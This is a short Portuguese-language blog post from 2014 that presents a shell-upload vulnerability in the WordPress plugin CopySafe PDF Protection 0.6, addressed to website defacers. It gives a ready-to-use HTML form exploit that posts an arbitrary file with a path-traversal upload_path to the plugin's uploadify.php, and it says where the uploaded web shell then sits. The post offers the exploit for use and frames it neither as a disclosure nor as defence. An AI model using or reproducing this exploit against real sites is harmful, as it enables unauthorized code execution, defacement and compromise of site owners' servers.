terça-feira, 5 de agosto de 2014

WordPress CopySafe PDF Protection 0.6 Shell Upload


0x WordPress CopySafe PDF Protection 0.6 Shell Upload

Continuando a serie de bugs voltados para o famoso wordpress dessa vez apresentamos um dos mais estúpidos que podem existir, esse bug possibilita o defacer fazer o upload de uma shell sem trabalho algum.
A vulnerabilidade fica alocada em lib/uploadify/uploadify.php com isso permite o upload de uma shell sem trabalho algum apos o upload a shell se aloca em http://site.gov.br/wp-content/uploads/shell.php
Bom mas vamos ao codigo do exploit que devera ser salvo como xpl.html no seu pc :)

  1. <form
  2. action="http://website.com/wp-content/plugins/wp-copysafe-pdf/lib/uploadify/uploadify.php"
  3. method="post"
  4. enctype="multipart/form-data">
  5. <label for="file">Filename:</label>
  6. <input type="file" name="wpcsp_file" ><br>
  7. <input type=text name="upload_path" value="../../../../uploads/">
  8. <input type="submit" name="submit" value="Submit">
  9. </form>




Nenhum comentário:

Postar um comentário

............